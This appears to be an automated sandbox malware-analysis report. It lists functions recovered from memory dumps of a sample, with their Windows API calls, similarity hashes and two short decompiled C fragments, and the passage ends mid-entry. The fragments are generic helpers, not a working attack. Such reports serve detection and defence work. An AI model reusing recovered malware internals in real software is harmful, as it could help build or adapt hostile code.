Uniqueness Score: -1.00%

Function 00B5407F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00B540A0
GetProcAddress.KERNEL32(00000000,?), ref: 00B540B9
OpenProcess.KERNEL32(00000400,00000000,?), ref: 00B540D6
IsWow64Process.KERNEL32(?,?), ref: 00B540E7
CloseHandle.KERNEL32(?,?,?), ref: 00B540FA

Strings

PWt, xrefs: 00B5408C, 00B540BF, 00B540E7

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HandleProcess$AddressCloseModuleOpenProcWow64
String ID: PWt
API String ID: 4157061983-1902262044
Opcode ID: 47e9b330fddd4753e3343dac20535e63da9fbed8c64620843b45f9f02cab0976
Instruction ID: 8a090340baf9a20da8bec71ae1e74a45cd3f1fab734840a901fb00fa562f826e
Opcode Fuzzy Hash: 47e9b330fddd4753e3343dac20535e63da9fbed8c64620843b45f9f02cab0976
Instruction Fuzzy Hash: 7901D271400204EFCB11DFA8EC08E9A7BFCFB8475672445A9FA09E3220EB305AC6CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B01A24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B01A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xb0d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xb0d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0xb0d290 = _t6;
					 *0xb0d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xb0d28c = _t7;
					if(_t7 == 0) {
						 *0xb0d28c =  *0xb0d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00b01a2c
0x00b01a32
0x00b01a39
0x00000000
0x00b01a93
0x00b01a3b
0x00b01a43
0x00b01a50
0x00b01a50
0x00b01a90
0x00000000
0x00b01a90
0x00b01a52
0x00b01a52
0x00b01a57
0x00b01a69
0x00b01a6e
0x00b01a74
0x00b01a7a
0x00b01a81
0x00b01a83
0x00b01a83
0x00000000
0x00b01a8a
0x00b01a4c
0x00000000
0x00000000
0x00b01a4e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B02669,?,?,00000001,?,?,?,00B01900,?), ref: 00B01A2C
GetVersion.KERNEL32(?,00000001,?,?,?,00B01900,?), ref: 00B01A3B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00B01900,?), ref: 00B01A57
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00B01900,?), ref: 00B01A74
GetLastError.KERNEL32(?,00000001,?,?,?,00B01900,?), ref: 00B01A93

Strings

@MtNt, xrefs: 00B01A93

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MtNt
API String ID: 2270775618-3251738875
Opcode ID: a8f9ac56c1551099621c8834b8c2fb33565dbcc73e24702dae254b3c1c1cc7f4
Instruction ID: 8c3b06cafcc0e93605e8763d99f4d4433e1c46c4b495ffc0b99ebe5660a07358
Opcode Fuzzy Hash: a8f9ac56c1551099621c8834b8c2fb33565dbcc73e24702dae254b3c1c1cc7f4
Instruction Fuzzy Hash: E9F04F74742302EBE7289FA8EC1972A3FA5E724751F104A5AE526C71E0EF70C441DF25

Uniqueness

Uniqueness Score: -1.00%

Function 00B5EF6E, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb285ba5a28653280428236f7b166f64b80c6f1f06975f727c90946811ea648b
Instruction ID: 4b11111f4fecbf08ca9df3c96be25d9a8bb8e8c3a77ea05cd52c34233d0e9359
Opcode Fuzzy Hash: bb285ba5a28653280428236f7b166f64b80c6f1f06975f727c90946811ea648b
Instruction Fuzzy Hash: 5141B6715007119FD720AF358C89A2BB7E8FB44366B184ABDFAAA835D1E7709849CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6BCB6, Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B5D4C8,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B6A415
Part of subcall function 00B6A406: mbstowcs.NTDLL ref: 00B6A431

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B6BD09

Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 00B5BB3E
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B5BB4A
Part of subcall function 00B5BAF2: memset.NTDLL ref: 00B5BB92
Part of subcall function 00B5BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B5BBAD
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(0000002C), ref: 00B5BBE5
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?), ref: 00B5BBED
Part of subcall function 00B5BAF2: memset.NTDLL ref: 00B5BC10
Part of subcall function 00B5BAF2: wcscpy.NTDLL ref: 00B5BC22

PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B6BD2A
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B6BD56

Part of subcall function 00B5BAF2: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B5BC48
Part of subcall function 00B5BAF2: RtlEnterCriticalSection.NTDLL(?), ref: 00B5BC7E
Part of subcall function 00B5BAF2: RtlLeaveCriticalSection.NTDLL(?), ref: 00B5BC9A
Part of subcall function 00B5BAF2: FindNextFileW.KERNEL32(?,00000000), ref: 00B5BCB3
Part of subcall function 00B5BAF2: WaitForSingleObject.KERNEL32(00000000), ref: 00B5BCC5
Part of subcall function 00B5BAF2: FindClose.KERNEL32(?), ref: 00B5BCDA
Part of subcall function 00B5BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B5BCEE
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(0000002C), ref: 00B5BD10

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00B6BD73
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B6BD94
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B6BDA9

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID:
API String ID: 2670873185-0
Opcode ID: 8bbf4f5314e148f82132b9667c54e11eff87cddf8388340554dea5cb316b9a5d
Instruction ID: b42afca84cb65d3e9f529400843e39f6b03bb6ac57b79c0b4131ad758e10a81d
Opcode Fuzzy Hash: 8bbf4f5314e148f82132b9667c54e11eff87cddf8388340554dea5cb316b9a5d
Instruction Fuzzy Hash: EA313772404246AFCB10AF64CC84C6EBBF9EB88354B1049BAF598E7121EB35DD49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B69F4D, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B69F67
CreateWaitableTimerA.KERNEL32(00B81248,00000003,?), ref: 00B69F84
GetLastError.KERNEL32(?,?,00B52212,?), ref: 00B69F95

Part of subcall function 00B54C22: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86,?), ref: 00B54C5A
Part of subcall function 00B54C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54C6E
Part of subcall function 00B54C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54C88
Part of subcall function 00B54C22: RegCloseKey.ADVAPI32(?,?,?,?,00B51F86,?,?,?), ref: 00B54CB2

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00B52212,?,?,?,00B52212,?), ref: 00B69FD5
SetWaitableTimer.KERNEL32(?,00B52212,00000000,00000000,00000000,00000000,?,?,00B52212,?), ref: 00B69FF4
HeapFree.KERNEL32(00000000,00B52212,00000000,00B52212,?,?,?,00B52212,?), ref: 00B6A00A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: e11952cc85f5baddef36c6537865b542bfc9c3cb1ab5573fcb67b1b8c71b07ab
Instruction ID: 1aca9ee8b9a1e2685a46a1878382bfcf9059c9fde02beda0f9f717d21bec6b21
Opcode Fuzzy Hash: e11952cc85f5baddef36c6537865b542bfc9c3cb1ab5573fcb67b1b8c71b07ab
Instruction Fuzzy Hash: 3B310971900209EBCF21EF95CC89DAFBBF9EB88751B108495E949B7110D734AE84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B51AE3, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

GetModuleHandleA.KERNEL32(?,00000020), ref: 00B51B08
GetProcAddress.KERNEL32(00000000,?), ref: 00B51B2A
GetProcAddress.KERNEL32(00000000,?), ref: 00B51B40
GetProcAddress.KERNEL32(00000000,?), ref: 00B51B56
GetProcAddress.KERNEL32(00000000,?), ref: 00B51B6C
GetProcAddress.KERNEL32(00000000,?), ref: 00B51B82

Part of subcall function 00B70B62: memset.NTDLL ref: 00B70BE3

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 96f5edca131f7f54f59c7ae7c28fe912d8a96cd4821c96752854f234ed9f3134
Instruction ID: 2f5f587d189db3a90d0cb7aa820080f5dbf884e64bbc0ade575b830692bcb61c
Opcode Fuzzy Hash: 96f5edca131f7f54f59c7ae7c28fe912d8a96cd4821c96752854f234ed9f3134
Instruction Fuzzy Hash: 302129B1500606AFD710EFA9CD44F6AB7FCEF0474070189E5EA45D7621EB74EA09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B57BE5, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 00B57C24
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B57C35
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 00B57C50
GetLastError.KERNEL32 ref: 00B57C66
HeapFree.KERNEL32(00000000,?), ref: 00B57C78
HeapFree.KERNEL32(00000000,?), ref: 00B57C8D

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 4b8381294d1b659a3a914fd6e9d5aac98a90a17a0d4602386c1ba4deb138f07c
Instruction ID: c992685b5cae68167923c40da0891de12ae574fed7cd4e855613d012490248fb
Opcode Fuzzy Hash: 4b8381294d1b659a3a914fd6e9d5aac98a90a17a0d4602386c1ba4deb138f07c
Instruction Fuzzy Hash: 38115176901128BBCF225B95DC48DEF7FBEEF453A1B1045A1F909A2130CB315A95EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B52662, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?), ref: 00B52680
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B526AE
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B526C0
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B526E5
HeapFree.KERNEL32(00000000,00000000), ref: 00B52700
RegCloseKey.ADVAPI32(?), ref: 00B5270A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID:
API String ID: 170146033-0
Opcode ID: 50934912dd18b787700ca11b7d9a7a901bceb44bef4b82799f55a03b6c942877
Instruction ID: 7cfd48afbf597d0207c3730ae9d6508932d3ded02eb969482ac9ef785cfc6e97
Opcode Fuzzy Hash: 50934912dd18b787700ca11b7d9a7a901bceb44bef4b82799f55a03b6c942877
Instruction Fuzzy Hash: 65110376901108FFDB11EB98DC88DAEBBFDEB49604B1045A6E901E3130DB315E4ADB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B57AB7, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00B7756B,?,00000000,?,00002334), ref: 00B57AC8
lstrlen.KERNEL32(?,?,?,?,?,?,00B7756B,?,00000000,?,00002334,?,?,?,?,00B512DF), ref: 00B57ACF
RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B57AE1
_snprintf.NTDLL ref: 00B57B07

Part of subcall function 00B6241D: memset.NTDLL ref: 00B62432
Part of subcall function 00B6241D: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B6246B
Part of subcall function 00B6241D: wcstombs.NTDLL ref: 00B62475
Part of subcall function 00B6241D: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 00B624A6
Part of subcall function 00B6241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624D2
Part of subcall function 00B6241D: TerminateProcess.KERNEL32(?,000003E5), ref: 00B624E8
Part of subcall function 00B6241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624FC
Part of subcall function 00B6241D: CloseHandle.KERNEL32(?), ref: 00B6252F
Part of subcall function 00B6241D: CloseHandle.KERNEL32(?), ref: 00B62534

_snprintf.NTDLL ref: 00B57B3B

Part of subcall function 00B6241D: GetLastError.KERNEL32 ref: 00B62500
Part of subcall function 00B6241D: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B62520

HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 00B57B58

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID:
API String ID: 1481739438-0
Opcode ID: c912ff6c82d4cf5d18ecea65546626d036259ec0e72a6f3f78a5115869fcdab5
Instruction ID: a2fc0007b460f500efa7aa0a4cfc741a1e4bfc488565264a53d9f6afe140c887
Opcode Fuzzy Hash: c912ff6c82d4cf5d18ecea65546626d036259ec0e72a6f3f78a5115869fcdab5
Instruction Fuzzy Hash: FE1181B2600118BFCF11AF54DC49E9E3F6EEB04360B154495FE1957231CA31DA51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6EE1C, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B5FD2F,00000001,00000000,00000000,?,?,00B5FD2F,00B6DF43,00000057,00000000), ref: 00B6EE32
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 00B6EE45
lstrcpy.KERNEL32(00000008,00B5FD2F), ref: 00B6EE67
GetLastError.KERNEL32(00B614A6,00000000,00000000,?,?,00B5FD2F,00B6DF43,00000057,00000000), ref: 00B6EE90
HeapFree.KERNEL32(00000000,00000000,?,?,00B5FD2F,00B6DF43,00000057,00000000), ref: 00B6EEA8
CloseHandle.KERNEL32(00000000,00B614A6,00000000,00000000,?,?,00B5FD2F,00B6DF43,00000057,00000000), ref: 00B6EEB1

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 96e597ca6131d06dffce8a5d5cb32689fd39187b1bba22fe4af87e20f4276ddf
Instruction ID: 965f619f146d413ea33aed7badf4c5a873a361608a91e7d936b53daec7212297
Opcode Fuzzy Hash: 96e597ca6131d06dffce8a5d5cb32689fd39187b1bba22fe4af87e20f4276ddf
Instruction Fuzzy Hash: 5F119075501209EFCB509FA8DC88DABBBE9FB01365710486AF82AD3220DB35DD85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AA75, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,00B57D29), ref: 00B5AA95
GetProcAddress.KERNEL32(00000000,?), ref: 00B5AAB4
GetProcAddress.KERNEL32(00000000,?), ref: 00B5AAC9
GetProcAddress.KERNEL32(00000000,?), ref: 00B5AADF
GetProcAddress.KERNEL32(00000000,?), ref: 00B5AAF5
GetProcAddress.KERNEL32(00000000,?), ref: 00B5AB0B

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: c0cc3189a31462586b192a5c174487daa6b69e046fa2c2b4294b18545825caed
Instruction ID: c069695ad8f8d2b0641b73de93044ff8ec8be913fd1816148628ed98b2e99cef
Opcode Fuzzy Hash: c0cc3189a31462586b192a5c174487daa6b69e046fa2c2b4294b18545825caed
Instruction Fuzzy Hash: 491121B520060B9F9610EBA9DC94F62B7ECEF0564130645E6FA05D7231EA74EA06CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E55D, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E56F

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF), ref: 00B6E588
GetCurrentThreadId.KERNEL32 ref: 00B6E595
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E5A1
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00B77545,00002334), ref: 00B6E5AF
lstrcpy.KERNEL32(00000000), ref: 00B6E5D1

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 54c30c6b7278fc86d89105b40b6875d8dcfb6535b4645c3b33d787ab882ff741
Instruction ID: d8daf695ad5458f970def9071a6d40d611bfa0bd4f4d57e515cea344839d6644
Opcode Fuzzy Hash: 54c30c6b7278fc86d89105b40b6875d8dcfb6535b4645c3b33d787ab882ff741
Instruction Fuzzy Hash: D801C436500215AB87215BA69C8CE6B3BFCEF91B447090065F91AE3110EF64ED05CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5542B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B554D6
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 00B55543
GetLastError.KERNEL32(?,00000000,00000000), ref: 00B5554D

Strings

K, xrefs: 00B55504
P, xrefs: 00B55500

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: b006da9975508b0b70940f91ced7ddf5a5241a66bf6929b1695e92d18e03cb80
Instruction ID: ddfebeca0ece1d0ffd77cb7eb20806ddab9ad7b1ac09c4f908e2dca1bce27c59
Opcode Fuzzy Hash: b006da9975508b0b70940f91ced7ddf5a5241a66bf6929b1695e92d18e03cb80
Instruction Fuzzy Hash: B8418E70910B45DFCB34CF64D954B6EBBF2FF64702F1449ADD88692A40E334A949CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6FA48, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,00B5F914,00000000,?,?,?,00B5F914,00000000,?,?,?,?), ref: 00B6FA86
lstrlen.KERNEL32(00B5F914,?,?,?,00B5F914,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B6FAA4
memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E05520,00000000), ref: 00B6FB13
lstrlen.KERNEL32(00B5F914,00000000,00000000,?,?,?,00B5F914,00000000,?,?,?,?), ref: 00B6FB34
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E05520), ref: 00B6FB48
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6FB51
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6FB5F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 51ad68f1bf8685e7ffee1268fb3354b9b8d7daf264ac0881fc790290d6d275ff
Instruction ID: 5434944ab087256a1d7b49776c751ff9d737f97b3a85259eba9ad244ca3ec399
Opcode Fuzzy Hash: 51ad68f1bf8685e7ffee1268fb3354b9b8d7daf264ac0881fc790290d6d275ff
Instruction Fuzzy Hash: B6410A7680021AABCF11DF65EC458EF3BA8EF14360B154465FD18A7221E735EE61DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B04B98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B04B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xb0d364; // 0x18d95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xb0d364; // 0x18d95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xb0d364; // 0x18d95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xb0e823) {
					HeapFree( *0xb0d270, 0, _t10);
					_t7 =  *0xb0d364; // 0x18d95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00b04b98
0x00b04ba1
0x00b04bb1
0x00b04bb1
0x00b04bb6
0x00b04bbb
0x00000000
0x00000000
0x00b04bab
0x00b04bab
0x00b04bbd
0x00b04bc2
0x00b04bc6
0x00b04bd9
0x00b04bdf
0x00b04bdf
0x00b04be8
0x00b04bea
0x00b04bee
0x00b04bf4

APIs

RtlEnterCriticalSection.NTDLL(018D9570), ref: 00B04BA1
Sleep.KERNEL32(0000000A,?,00B05390), ref: 00B04BAB
HeapFree.KERNEL32(00000000,?,?,00B05390), ref: 00B04BD9
RtlLeaveCriticalSection.NTDLL(018D9570), ref: 00B04BEE

Strings

Ut, xrefs: 00B04BD9

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 2ef33d95428dd8a42eca72096a66b8608ba6bd212464397e744bacd131ac556e
Instruction ID: 65275269d16cab90bf76407114102f5d4055fcd6427aa8afe9a5e8ecbbbca524
Opcode Fuzzy Hash: 2ef33d95428dd8a42eca72096a66b8608ba6bd212464397e744bacd131ac556e
Instruction Fuzzy Hash: 76F0D4B8604201DFEB188FA5EE99F153BE4FB65300B048199EA02C72F0DB30EC00DA19

Uniqueness

Uniqueness Score: -1.00%

Function 00B66DC4, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

lstrcpy.KERNEL32(?,00000020), ref: 00B66EC1
lstrcat.KERNEL32(?,00000020), ref: 00B66ED6
lstrcmp.KERNEL32(00000000,?), ref: 00B66EED
lstrlen.KERNEL32(?), ref: 00B66F11

Strings

, xrefs: 00B66E5A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 9b6c73544e269947f9b4d8c31f0c6bacd2872c9c5d6b5377223680d2d840cdf0
Instruction ID: 8ff0d758c24a2d15c921096ca1fb467022241627204f3acb01a0bf7345252385
Opcode Fuzzy Hash: 9b6c73544e269947f9b4d8c31f0c6bacd2872c9c5d6b5377223680d2d840cdf0
Instruction Fuzzy Hash: 3B51AE35A00108EBCF21DF99C885BADBBF6FF55315F14809AE819AB211C775AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5A608, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6CB9E: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,00B5A627,?,80000001,?), ref: 00B6CBAF
Part of subcall function 00B6CB9E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00B6CBCC

lstrlenW.KERNEL32(00000000,00000000,74B606E0,?,?,80000001,?), ref: 00B5A64E
lstrlenW.KERNEL32(00000008), ref: 00B5A655
lstrlenW.KERNEL32(?,?), ref: 00B5A671
lstrlen.KERNEL32(?,?,00000000), ref: 00B5A6EB
lstrlenW.KERNEL32(?), ref: 00B5A6F7
wsprintfA.USER32 ref: 00B5A725

Part of subcall function 00B70757: RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 5ac769cf54a459d76d110dab230cfe54d3f253177e06eb0e742e0b81aaecaf92
Instruction ID: 1a2945bad7752d5728130b0c9ff9eab10ff9b755b5977dd6d0b1213daf795b37
Opcode Fuzzy Hash: 5ac769cf54a459d76d110dab230cfe54d3f253177e06eb0e742e0b81aaecaf92
Instruction Fuzzy Hash: 6B413971900109AFCB11AFA8DC85EAE7BFDEF44305B058495F914A7221EB35DA15DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5A917, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A939
